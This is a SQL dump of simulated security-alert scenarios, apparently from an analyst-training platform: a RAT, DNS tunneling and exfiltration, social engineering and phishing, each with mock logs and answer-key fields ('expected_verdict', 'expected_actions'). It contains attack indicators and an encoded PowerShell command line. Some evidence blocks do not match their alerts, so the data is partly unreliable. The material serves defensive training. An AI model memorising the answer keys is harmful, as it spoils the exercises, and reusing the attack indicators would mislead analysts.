NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(497, 'Matryoshka RAT Execution', 'high', 'EDR systems', 'Having gained initial access, the attackers execute the Matryoshka RAT on the infected systems, establishing a foothold and enabling further malicious activity. The EDR system detected the execution of a suspicious file associated with the Matryoshka RAT.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"1001\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\matryoshka.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_id\":\"5678\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"activity\":\"Execution of suspicious file\",\"signature\":\"Matryoshka RAT\"}', '2026-01-05 04:03:13', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known signature of Matryoshka RAT\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"matryoshka.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(498, 'DNS Tunneling Activity Identified', 'high', 'DNS logs', 'To ensure sustained access, the attackers employ DNS tunneling, using Matryoshka RAT to communicate with their command and control (C2) server undetected.', 'Persistence', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"103.21.244.15\",\"dns_query\":\"subdomain.example.com\",\"dns_response\":\"NXDOMAIN\",\"protocol\":\"UDP\",\"port\":53,\"query_type\":\"A\",\"malware_hash\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"username\":\"jdoe\",\"filename\":\"matryoshka_rat.dll\"}', '2026-01-05 04:03:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"103.21.244.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with DNS tunneling\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash identified with Matryoshka RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File associated with Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(499, 'Unusual Network Traffic Patterns', 'high', 'Network traffic analysis tools', 'Detected DNS tunneling activity used for lateral movement within the network, originating from an internal host attempting to exfiltrate data from various departments in the Ministry.', 'Lateral Movement', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:08Z\",\"source_ip\":\"10.0.3.25\",\"destination_ip\":\"8.8.8.8\",\"dns_query\":\"sensitive-docs.ministry.local.tunnel.com\",\"method\":\"DNS_TUNNELING\",\"user\":\"jdoe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"Network Intrusion Detection System\",\"alert_id\":\"NT-20231015-0004\"}', '2026-01-05 04:03:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for DNS tunneling.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"public\",\"verdict\":\"suspicious\",\"details\":\"Public IP used for external DNS tunneling.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User initiating the DNS tunneling.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known DNS tunneling tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, 
NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(500, 'Exfiltration Attempt via Encoded DNS Queries', 'high', 'Intrusion detection systems (IDS)', 'In the final stage, the attackers attempt to exfiltrate reconstructed documents through encoded DNS queries, aiming to send these valuable files back to their servers.', 'Exfiltration', 'T1071.004 - Application Layer Protocol: DNS', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"DNS\",\"query\":\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\",\"type\":\"TXT\",\"user\":\"jdoe\",\"hostname\":\"workstation-45.local\",\"file_hash\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"filename\":\"classified_docs.zip\",\"dns_server\":\"8.8.8.8\",\"dns_response\":\"NoError\"}', '2026-01-05 04:03:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT database\",\"verdict\":\"malicious\",\"details\":\"Known malicious server used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data stealing malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file containing sensitive documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(501, 'Suspicious Connection from Unverified Facebook Profile', 'medium', 'Social Media Monitoring Tools', 'A suspicious connection request from an unverified Facebook profile targeting aerospace employees has been detected. The profile appears to be linked to Rocket Kitten APT, aiming to establish initial contact through social engineering tactics.', 'Social Engineering', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"platform\":\"Facebook\",\"source_ip\":\"203.0.113.45\",\"target_user\":\"jdoe@aerospacecorp.com\",\"profile_name\":\"Jane Smith\",\"profile_id\":\"fb123456789\",\"profile_url\":\"https://facebook.com/fb123456789\",\"message_content\":\"Hi, I\'m a professional in aerospace technology and would love to connect.\",\"internal_review\":\"Profile created 2 days ago, minimal activity, no verified connections.\",\"connection_status\":\"Pending\",\"internal_ip\":\"192.168.1.105\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"jdoe@aerospacecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Email belongs to an aerospace employee.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://facebook.com/fb123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"Social Media Analysis\",\"verdict\":\"suspicious\",\"details\":\"Recently created profile, minimal activity.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, 
NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane 
Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(502, 'Malicious Direct Message Sent to Employee', 'high', 'Email Security Gateway', 'An attacker, after gaining the trust of an employee, sent a direct message with a malicious attachment disguised as a legitimate document. The attachment is designed to deliver the \'Gholee\' malware payload.', 'Phishing', 'T1566.001: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"email_id\":\"abc123xyz\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@company.com\",\"subject\":\"Industry Report Update\",\"attachment\":\"industry_report_update.docx\",\"attachment_hash\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"malware_name\":\"Gholee\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"url\":\"http://maliciousdomain.com/download\",\"indicator_of_compromise\":[\"attacker@maliciousdomain.com\",\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"203.0.113.45\",\"http://maliciousdomain.com/download\"]}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Malicious download 
link.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Direct Message Sent to Employee\",\"date\":\"2026-02-01T20:32:19.116Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
